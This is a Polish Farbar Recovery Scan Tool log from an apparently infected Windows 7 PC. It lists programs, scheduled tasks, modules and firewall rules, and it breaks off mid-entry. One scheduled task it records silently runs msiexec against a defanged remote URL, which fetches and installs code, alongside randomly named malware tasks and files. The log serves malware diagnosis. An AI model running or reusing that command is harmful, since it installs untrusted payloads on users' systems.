Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 08-05-2017 Uruchomiony przez And (12-05-2017 10:59:16) Uruchomiony z C:\Users\And\Downloads Windows 7 Professional Service Pack 1 (X64) (2015-11-23 17:09:14) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-1391594616-1957220202-1850595550-500 - Administrator - Disabled) And (S-1-5-21-1391594616-1957220202-1850595550-1000 - Administrator - Enabled) => C:\Users\And Gość (S-1-5-21-1391594616-1957220202-1850595550-501 - Limited - Disabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) 64 Bit HP CIO Components Installer (Version: 20.2.1 - HP Inc.) Hidden 7-Zip 9.20 (HKLM-x32\...\7-Zip) (Version: - ) ABBYY PDF Transformer 2.0 (HKLM-x32\...\{FA200000-0001-0000-0000-074957833700}) (Version: 2.0.982.4931 - ABBYY Software Ltd.) Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated) Armor CompaSearch (HKLM-x32\...\Armor CompaSearch) (Version: - ) Avast Browser Cleanup (HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Avast Browser Cleanup) (Version: 12.1.2272.125 - AVAST Software) Canon iP4900 series Printer Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_iP4900_series) (Version: - Canon Inc.) CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.7.6389 - CDBurnerXP) Common Desktop Agent (Version: 1.62.0 - OEM) Hidden CutePDF Writer 2.7 (HKLM\...\CutePDF Writer Installation) (Version: - ) Dell 2355dn Laser MFP Software Uninstall (HKLM-x32\...\Dell 2355dn Laser MFP) (Version: - DELL Inc.) Dell System Detect (HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\58d94f3ce2c27db0) (Version: 6.12.0.5 - Dell) DeviceClient wersja 2.9.0.0 (HKLM-x32\...\{9FA06957-C278-4BC2-9C58-0107C160D761}}_is1) (Version: 2.9.0.0 - ) EPSON Printer Software (HKLM\...\EPSON Printer and Utilities) (Version: - SEIKO EPSON Corporation) EPSON Stylus SX200 Series Printer Uninstall (HKLM\...\EPSON Stylus SX200 Series) (Version: - SEIKO EPSON Corporation) Fakt wersja 2016.08a (HKLM-x32\...\{4CB47AB3-2583-4F6A-BA3A-5B8654834156}_is1) (Version: 2016.08a - Fakt Dystrybucja Sp. z o.o.) foobar2000 v1.3.10 (HKLM-x32\...\foobar2000) (Version: 1.3.10 - Peter Pawlowski) Foxit Reader (HKLM-x32\...\Foxit Reader) (Version: - ) Gadu-Gadu 10 (HKLM-x32\...\Gadu-Gadu 10_is1) (Version: - ) GG (HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\GG) (Version: 12 - GG Network S.A.) GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team) GnuWin32: sed-4.2.1 (HKLM-x32\...\sed-4.2.1_is1) (Version: 4.2.1 - GnuWin) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.96 - Google Inc.) Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden HP Deskjet 2510 series — podstawowe oprogramowanie urządzenia (HKLM\...\{F0DD70C6-B53F-42B5-8A67-62863E6E5EEF}) (Version: 28.0.1313.0 - Hewlett-Packard Co.) HP Deskjet 2510 series Setup Guide (HKLM-x32\...\{216C7F38-4BBC-4E9A-8392-C9FA21B54386}) (Version: 27.0.0 - Hewlett Packard) HP Deskjet 6520 series — podstawowe oprogramowanie urządzenia (HKLM\...\{23FE8E9B-4613-4E4F-8A4C-63210972507C}) (Version: 28.0.1315.0 - Hewlett-Packard Co.) HP Install Network Printer Wizard (HKLM-x32\...\{C5E5233B-17E9-4F1B-824D-46571B780EB1}) (Version: - ) HP LaserJet Professional P1100-P1560-P1600 Series (HKLM\...\HP LaserJet Professional P1100-P1560-P1600 Series) (Version: - ) HP Officejet Pro 8600 — podstawowe oprogramowanie urządzenia (HKLM\...\{7F27E6D4-0760-4F3C-9CF7-41DA73DF428D}) (Version: 28.0.1315.0 - Hewlett-Packard Co.) hppLaserJetService (x32 Version: 001.001.0.0 - Hewlett-Packard) Hidden hppP1100P1560P1600SeriesLaserJetService (x32 Version: 001.001.0.0 - Hewlett-Packard) Hidden hppusgP1100P1560P1600Series (x32 Version: 1.0.0.1 - Hewlett-Packard) Hidden HPSSupply (HKLM-x32\...\{7902E313-FF0F-4493-ACB1-A8147B78DCD0}) (Version: 2.1.1.0000 - Hewlett Packard Development Company L.P.) initialsite123 - Uninstall (HKLM-x32\...\{0015D991-2A21-4CDD-9CCB-569838BCD969}) (Version: - ) <==== UWAGA Java 8 Update 111 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180111F0}) (Version: 8.0.1110.14 - Oracle Corporation) Lexmark 1200 Series (HKLM\...\Lexmark 1200 Series) (Version: - Lexmark International, Inc.) LibreOffice 5.0.3.2 (HKLM-x32\...\{D61E7AA0-0380-49B9-8DDD-7685E2306176}) (Version: 5.0.3.2 - The Document Foundation) Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech) MarketResearch (x32 Version: 130.0.374.000 - Hewlett-Packard) Hidden Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation) Microsoft SQL Server 2008 Setup Support Files (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation) Microsoft SQL Server 2012 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version: - Microsoft Corporation) Microsoft SQL Server 2012 Native Client (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation) Microsoft SQL Server 2012 Setup (English) (HKLM\...\{8CB0713F-CFE0-445D-BCB2-538465860E1A}) (Version: 11.1.3128.0 - Microsoft Corporation) Microsoft SQL Server 2012 Transact-SQL ScriptDom (HKLM\...\{0E8670B8-3965-4930-ADA6-570348B67153}) (Version: 11.0.2100.60 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft VSS Writer for SQL Server 2012 (HKLM\...\{3E0DD83F-BE4C-4478-86A0-AD0D79D1353E}) (Version: 11.0.2100.60 - Microsoft Corporation) Mozilla Firefox 53.0.2 (x86 pl) (HKLM-x32\...\Mozilla Firefox 53.0.2 (x86 pl)) (Version: 53.0.2 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.2.6333 - Mozilla) Mozilla Thunderbird 45.8.0 (x86 pl) (HKLM-x32\...\Mozilla Thunderbird 45.8.0 (x86 pl)) (Version: 45.8.0 - Mozilla) Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden ntsn.serwis 1.23 (HKLM-x32\...\{B6F07D49-262D-4842-8822-C2FBA4F5F937}_is1) (Version: 1.23 - ntsn.pl) Odinstaluj drukarkę EPSON S22 Series (HKLM\...\EPSON S22 Series) (Version: - SEIKO EPSON Corporation) Odinstaluj drukarkę Epson Stylus Photo R2000 (HKLM\...\Epson Stylus Photo R2000) (Version: - SEIKO EPSON Corporation) PC CCID (HKLM\...\{BD69DF65-B294-4F1A-A3BE-B93D813AB1E4}) (Version: 1.0.0 - Gemalto) PDF-XChange Viewer (HKLM\...\{9ED333F8-3E6C-4A38-BAFA-728454121CDA}) (Version: 2.5.319.0 - Tracker Software Products (Canada) Ltd.) PL-2303 USB-to-Serial (HKLM-x32\...\{ECC3713C-08A4-40E3-95F1-7D0704F1CE5E}) (Version: 1.6.0 - Prolific Technology INC) Polski pakiet językowy dla programu Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile PLK Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Polski pakiet językowy dla programu Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended PLK Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Samsung OCR Software (HKLM-x32\...\Samsung OCR Software) (Version: 1.00.05 (2012-07-10) - Samsung Electronics Co., Ltd.) Scan Manager (HKLM-x32\...\{7DB705DB-930F-4BF9-AF40-5D93D3B35730}) (Version: 0.00.0013 - Dell) SoulseekQt wersja 2016.4.24 (HKLM-x32\...\{8A4E1646-488C-4E5B-AC31-F784400E8D2D}_is1) (Version: 2016.4.24 - Soulseek LLC) SQL Server 2012 Common Files (Version: 11.0.2100.60 - Microsoft Corporation) Hidden SQL Server 2012 Database Engine Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden SQL Server 2012 Database Engine Shared (Version: 11.0.2100.60 - Microsoft Corporation) Hidden SQL Server Browser for SQL Server 2012 (HKLM-x32\...\{4B9E6EB0-0EED-4E74-9479-F982C3254F71}) (Version: 11.0.2100.60 - Microsoft Corporation) Sql Server Customer Experience Improvement Program (Version: 11.0.2100.60 - Microsoft Corporation) Hidden Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 8.52a - Ghisler Software GmbH) TP-LINK TL-WN723N Driver (HKLM-x32\...\{B82D0422-A202-4E51-92F2-821A35CC833F}) (Version: 1.1.0 - TP-LINK) Uninstall Samsung Printer Software (HKLM-x32\...\TotalUninstaller) (Version: 4.0.0.67 - Samsung Electronics CO., LTD.) WicReset version 5.0.0.2 (HKLM-x32\...\{20379D3A-321B-4830-96A6-37183B713AE8}_is1) (Version: 5.0.0.2 - WWW.WIC.SUPPORT) XnView 2.36 (HKLM-x32\...\XnView_is1) (Version: 2.36 - Gougelet Pierre-e) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-1391594616-1957220202-1850595550-1000_Classes\CLSID\{E68D0A55-3C40-4712-B90D-DCFA93FF2534}\InprocServer32 -> C:\Users\And\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll (GG Network S.A.) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {12037C07-0DC9-4312-9AAD-28405F988693} - System32\Tasks\avastBCLS-1-5-21-1391594616-1957220202-1850595550-1000 => C:\Users\And\AppData\Roaming\AVAST Software\Browser Cleanup\BCUSched.exe [2017-05-10] (AVAST Software) Task: {39DD353A-D6FC-4378-97A9-266E51D43C1B} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation) Task: {546BC054-DB30-4BEF-822F-F465662AC69F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-24] (Google Inc.) Task: {5C315247-7CF8-4294-B160-6CD790E6648C} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-09] () <==== UWAGA Task: {6DB767A5-2000-4EDA-B4FE-EE07B4BAC81D} - System32\Tasks\Lerfopervather Host => C:\Program Files (x86)\Drabocultthhery\nahit.exe [2017-05-09] (Google Inc.) Task: {6DE9C13A-8EE5-46B0-B795-AD460E7657A9} - System32\Tasks\RunAtStartup => C:\Users\And\AppData\Roaming\Event Monitor\em.exe <==== UWAGA Task: {74A84777-529C-4880-B4BC-EBCA8D386601} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-10] (Adobe Systems Incorporated) Task: {78630AE3-37F8-4F78-9F8E-A8C2088E8776} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2015-07-31] (Microsoft Corporation) Task: {7FFF2EF2-C146-4D1C-A628-4D785460AA93} - System32\Tasks\Exif Bestel for Windows 8 => Rundll32.exe "C:\Program Files\Exif Bestel for Windows 8\Exif Bestel for Windows 8.dll",ypTQVww Task: {83CD2AE7-350B-4D3D-B940-E7CD2C37AED2} - System32\Tasks\Reozosh => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=3219913727_67194_F412129D&d=20170509 /q <==== UWAGA Task: {A23B23F0-D3D4-4BDA-A1DE-0392594C8B2A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation) Task: {AB97CB2B-3125-4174-99B4-C4390542F29E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-24] (Google Inc.) Task: {D93D5F3B-6403-4A5B-A07E-AA11A8D4D4A8} - System32\Tasks\avast! BCU UpdateS-1-5-21-1391594616-1957220202-1850595550-1000 => C:\Users\And\AppData\Roaming\AVAST Software\Browser Cleanup\BCUUpdate.exe [2015-03-18] (AVAST Software) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ==================== Załadowane moduły (filtrowane) ============== 2016-02-05 14:43 - 2007-07-12 23:37 - 00085504 _____ () C:\Windows\System32\cpwmon64.dll 2017-04-20 15:37 - 2012-08-31 15:03 - 00288768 _____ () C:\Windows\System32\HP1100LM.DLL 2016-01-11 16:27 - 2010-01-23 05:02 - 00027648 _____ () C:\Windows\System32\sdf2ml6.dll 2016-09-06 11:08 - 2015-03-12 04:43 - 00022528 _____ () C:\Windows\System32\us00alm.dll 2017-04-20 15:37 - 2012-08-31 15:02 - 00074240 _____ () C:\Windows\system32\spool\PRTPROCS\x64\HP1100PP.DLL 2017-05-09 12:16 - 2017-05-09 12:16 - 00312832 _____ () C:\Program Files (x86)\Lerfopervather Host\local64spl.dll 2017-05-09 12:16 - 2015-06-01 14:57 - 02912768 _____ () C:\Program Files\Exif Bestel for Windows 8\Exif Bestel for Windows 8.dll 2017-05-10 00:48 - 2017-05-12 10:26 - 00336384 _____ () C:\Windows\TEMP\gAEFA.tmp.exe 2017-05-12 10:26 - 2017-05-12 10:26 - 00477184 _____ () C:\Windows\TEMP\gAADE.tmp.exe 2017-05-09 12:16 - 2017-05-09 12:16 - 00147968 _____ () C:\Users\And\AppData\Roaming\Ckanovofesp\Qpution.dll 2012-03-09 10:58 - 2012-03-09 10:58 - 00462712 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe 2016-01-11 16:27 - 2013-01-17 07:43 - 01651200 _____ () C:\Windows\system32\spool\DRIVERS\x64\3\dp2355pu.dll 2015-11-16 13:38 - 2016-07-25 11:26 - 03716144 _____ () C:\Users\And\AppData\Local\GG\Application\xulrunner\mozjs.dll 2015-11-16 13:38 - 2016-07-25 11:26 - 16361120 _____ () C:\Users\And\AppData\Local\GG\Application\FMSBWChecker\Adobe AIR\Versions\1.0\Resources\NPSWF32.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) IE trusted site: HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\dell.com -> dell.com ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2017-05-10 15:29 - 2017-05-10 15:29 - 00000355 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ::1 localhost ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Control Panel\Desktop\\Wallpaper -> DNS Servers: 192.168.0.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == MSCONFIG\Services: lxcz_device => 2 MSCONFIG\startupfolder: C:^Users^And^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Powiadomienia monitorowania tuszu - HP Deskjet 2510 series.lnk => C:\Windows\pss\Powiadomienia monitorowania tuszu - HP Deskjet 2510 series.lnk.Startup MSCONFIG\startupfolder: C:^Users^And^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Powiadomienia monitorowania tuszu - HP Deskjet 6520 series.lnk => C:\Windows\pss\Powiadomienia monitorowania tuszu - HP Deskjet 6520 series.lnk.Startup MSCONFIG\startupfolder: C:^Users^And^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Powiadomienia monitorowania tuszu - HP Officejet Pro 8600.lnk => C:\Windows\pss\Powiadomienia monitorowania tuszu - HP Officejet Pro 8600.lnk.Startup MSCONFIG\startupfolder: C:^Users^And^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^x.vbs => C:\Windows\pss\x.vbs.Startup MSCONFIG\startupfolder: C:^Users^And^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^z.vbs => C:\Windows\pss\z.vbs.Startup MSCONFIG\startupreg: BestZiper => "C:\Program Files (x86)\BestZiper\BestZiper.exe" MSCONFIG\startupreg: HPUsageTrackingLEDM => "C:\Program Files (x86)\HP\HP UT LEDM\bin\hppusg.exe" "C:\Program Files (x86)\HP\HP UT LEDM\" MSCONFIG\startupreg: N0FGC0HF1V04D31 => "C:\Program Files (x86)\BestZiper\5L5DB.exe" MSCONFIG\startupreg: ukoivek2U'.exe => C:\Program Files\DeviceClient\B58EKQXZ\ukoivek2U'.exe -r1_5 -r2_1 ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [{38B23A28-5A5C-4B3D-8368-895C7F20FD62}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{D23C7647-F178-447B-9901-E25C698DE1C2}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{3B454D82-58EF-410F-8D90-0B7890240F0D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe FirewallRules: [{46002A34-47BF-4D46-B13C-0D7A34477C87}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe FirewallRules: [{A9E16571-3501-4070-8840-B59F46D103CB}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe FirewallRules: [{A4F0ABB9-B4F8-489C-A12A-F45C35915B10}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe FirewallRules: [TCP Query User{471A1AA2-A1DB-480C-8754-D3D2B8670100}C:\program files (x86)\nowe gadu-gadu\gg.exe] => (Allow) C:\program files (x86)\nowe gadu-gadu\gg.exe FirewallRules: [UDP Query User{687E06B6-BD91-44B8-93EE-960901BC7DDA}C:\program files (x86)\nowe gadu-gadu\gg.exe] => (Allow) C:\program files (x86)\nowe gadu-gadu\gg.exe FirewallRules: [TCP Query User{A723E724-DA13-4C9C-A96E-D657AAE49DA9}C:\program files (x86)\gadu-gadu 10\gg.exe] => (Allow) C:\program files (x86)\gadu-gadu 10\gg.exe FirewallRules: [UDP Query User{1E569E5B-67FE-41BA-8C07-6AFA6AA99CD5}C:\program files (x86)\gadu-gadu 10\gg.exe] => (Allow) C:\program files (x86)\gadu-gadu 10\gg.exe FirewallRules: [TCP Query User{7F1EADE0-5CD0-4CA5-B1BB-BDC95015B252}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe FirewallRules: [UDP Query User{055325D7-9C17-4341-97B9-79BC82939F90}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe FirewallRules: [TCP Query User{524F2DA6-A08E-4DDE-944A-0F3B99923C35}C:\program files (x86)\gadu-gadu 10\gg.exe] => (Allow) C:\program files (x86)\gadu-gadu 10\gg.exe FirewallRules: [UDP Query User{8557C8C8-9552-4B5B-A0FC-C326F36C7F4B}C:\program files (x86)\gadu-gadu 10\gg.exe] => (Allow) C:\program files (x86)\gadu-gadu 10\gg.exe FirewallRules: [{2DB146FD-65A3-4648-90E3-C639C00B9856}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{AEF7B69F-AC49-4ECF-BEA4-F5D1A89A7FE5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{546EEF7C-3D47-41A1-B0DE-926A61D286AE}] => (Allow) C:\Windows\twain_32\Dell\DELL2355\Sscan2io.exe FirewallRules: [{702AB5B1-C742-4C12-B836-28ED0292EC11}] => (Allow) C:\Windows\twain_32\Dell\DELL2355\Sscan2io.exe FirewallRules: [{FE6FEDEE-500A-4A38-BED7-249CE68FF6CC}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe FirewallRules: [{FD8B8D37-A9FE-405F-8935-E2ED10C4FFAB}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe FirewallRules: [{819F390F-AE13-44C1-8C00-29F8C4D54A10}] => (Allow) C:\Program Files (x86)\DELL\Dell 2355dn Laser MFP\Dell Scan Manager\ScanMgr2.exe FirewallRules: [{42DC7558-6D90-49F3-9AD5-89EDF0FDB45A}] => (Allow) C:\Program Files (x86)\DELL\Dell 2355dn Laser MFP\Dell Scan Manager\ScanMgr2.exe FirewallRules: [{7B1BFEEC-F759-4208-B177-6ECFF3F3CDA8}] => (Allow) C:\Program Files (x86)\DELL\Dell 2355dn Laser MFP\Dell Scan Manager\USDAgent\USDAgent.exe FirewallRules: [{716147AE-C2AF-47A6-9B04-088D4027F80C}] => (Allow) C:\Program Files (x86)\DELL\Dell 2355dn Laser MFP\Dell Scan Manager\USDAgent\USDAgent.exe FirewallRules: [{8D13FC57-07DF-4429-A79C-B3D942EEABE8}] => (Allow) C:\Program Files (x86)\DELL\Dell 2355dn Laser MFP\Dell Scan Manager\PropertyUI\Sscan2io.exe FirewallRules: [{23C43110-FC15-4617-8E77-6C61FCDCA967}] => (Allow) C:\Program Files (x86)\DELL\Dell 2355dn Laser MFP\Dell Scan Manager\PropertyUI\Sscan2io.exe FirewallRules: [{061C5EEB-8D8B-4EE5-BFC0-758FEE7C6FF9}] => (Allow) C:\Program Files (x86)\DELL\Dell 2355dn Laser MFP\Dell Scan Manager\CDAS2PC\CDAS2PC.exe FirewallRules: [{FD4BD579-5917-49A6-8A47-0564704B7868}] => (Allow) C:\Program Files (x86)\DELL\Dell 2355dn Laser MFP\Dell Scan Manager\CDAS2PC\CDAS2PC.exe FirewallRules: [TCP Query User{45CA6B54-92F1-4B73-AA7A-3E7A0798ABEA}C:\program files (x86)\hewlett-packard\hp install network printer wizard\hpjsi.exe] => (Allow) C:\program files (x86)\hewlett-packard\hp install network printer wizard\hpjsi.exe FirewallRules: [UDP Query User{3E27ECEE-C685-4EA8-8515-7C7CA73EACEF}C:\program files (x86)\hewlett-packard\hp install network printer wizard\hpjsi.exe] => (Allow) C:\program files (x86)\hewlett-packard\hp install network printer wizard\hpjsi.exe FirewallRules: [TCP Query User{7305CB1E-0040-4B40-8156-4B8EA4FFAA14}C:\program files (x86)\e-mo.pl\a2c\action2sklep.exe] => (Allow) C:\program files (x86)\e-mo.pl\a2c\action2sklep.exe FirewallRules: [UDP Query User{D766A234-A91F-41F6-B9DC-F1D240A71DF2}C:\program files (x86)\e-mo.pl\a2c\action2sklep.exe] => (Allow) C:\program files (x86)\e-mo.pl\a2c\action2sklep.exe FirewallRules: [{8A7F135E-E6C5-4264-AC99-72B335EC5E96}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\FaxApplications.exe FirewallRules: [{71958DD3-E218-486E-9263-2D010F166FB8}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\DigitalWizards.exe FirewallRules: [{B3DF8730-168D-44A5-BF99-E149C09F7E61}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\bin\SendAFax.exe FirewallRules: [{5B8E365A-FBB8-4C3E-84C3-61EF71E65380}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\DeviceSetup.exe FirewallRules: [{949AFC28-19EC-42CB-B31B-47E247D4DCC7}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicator.exe FirewallRules: [{B81E9860-FB88-4DB9-92B7-007F2537238A}] => (Allow) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [TCP Query User{5718CC3F-FA2B-4991-BAC7-6884989686ED}C:\program files (x86)\soulseekqt\soulseekqt.exe] => (Allow) C:\program files (x86)\soulseekqt\soulseekqt.exe FirewallRules: [UDP Query User{806E3D1D-8BDA-4C55-B0F0-6F0B6C0C9D3C}C:\program files (x86)\soulseekqt\soulseekqt.exe] => (Allow) C:\program files (x86)\soulseekqt\soulseekqt.exe FirewallRules: [{E86F6F22-A598-4923-846B-7FA9D1B999CF}] => (Allow) C:\Program Files\HP\HP Deskjet 2510 series\Bin\USBSetup.exe FirewallRules: [{B0393293-0A71-42C7-9475-7EBD90D74BD5}] => (Allow) C:\Users\And\AppData\Local\Temp\7zS152A\HPDiagnosticCoreUI.exe FirewallRules: [{09221BDF-C37B-4D2E-90B4-8F707EF3E8E0}] => (Allow) C:\Users\And\AppData\Local\Temp\7zS152A\HPDiagnosticCoreUI.exe FirewallRules: [{7C57D8D0-7E87-457B-8E24-1E69E4B01E6F}] => (Allow) C:\Windows\SysWOW64\lxczcoms.exe FirewallRules: [{F62AABE0-CC97-46A5-9B82-692D567F5BDE}] => (Allow) C:\Windows\SysWOW64\lxczcoms.exe FirewallRules: [{CED18561-E63F-4315-80B2-D1EA58BE1085}] => (Allow) C:\Windows\System32\lxczcoms.exe FirewallRules: [{3975A39A-DE06-47B0-8202-D194F5C9A9CE}] => (Allow) C:\Windows\System32\lxczcoms.exe FirewallRules: [TCP Query User{8FE86A59-1E7D-4748-B1BF-78F9CBC28BC9}C:\st\search_tool4.2.exe] => (Allow) C:\st\search_tool4.2.exe FirewallRules: [UDP Query User{2D2EF3BD-078B-4465-A7AA-D4D47541C43D}C:\st\search_tool4.2.exe] => (Allow) C:\st\search_tool4.2.exe FirewallRules: [TCP Query User{1F6FDEA9-9DD5-4387-923D-CBD5C7ABC7FA}C:\program files (x86)\deviceclient\deviceclient.exe] => (Allow) C:\program files (x86)\deviceclient\deviceclient.exe FirewallRules: [UDP Query User{08DBA172-DF75-4F83-96B0-5BABE8DEB410}C:\program files (x86)\deviceclient\deviceclient.exe] => (Allow) C:\program files (x86)\deviceclient\deviceclient.exe FirewallRules: [TCP Query User{E076C45B-C9CF-4592-A41D-EDA8C7C95A3A}C:\program files (x86)\deviceclient\onlineplayback.exe] => (Allow) C:\program files (x86)\deviceclient\onlineplayback.exe FirewallRules: [UDP Query User{46B4A7AE-1D49-4D8D-BDE0-AD7FB3B355BF}C:\program files (x86)\deviceclient\onlineplayback.exe] => (Allow) C:\program files (x86)\deviceclient\onlineplayback.exe FirewallRules: [{9A1CCCEA-F2EB-49B0-97E6-566207983171}] => (Allow) C:\Program 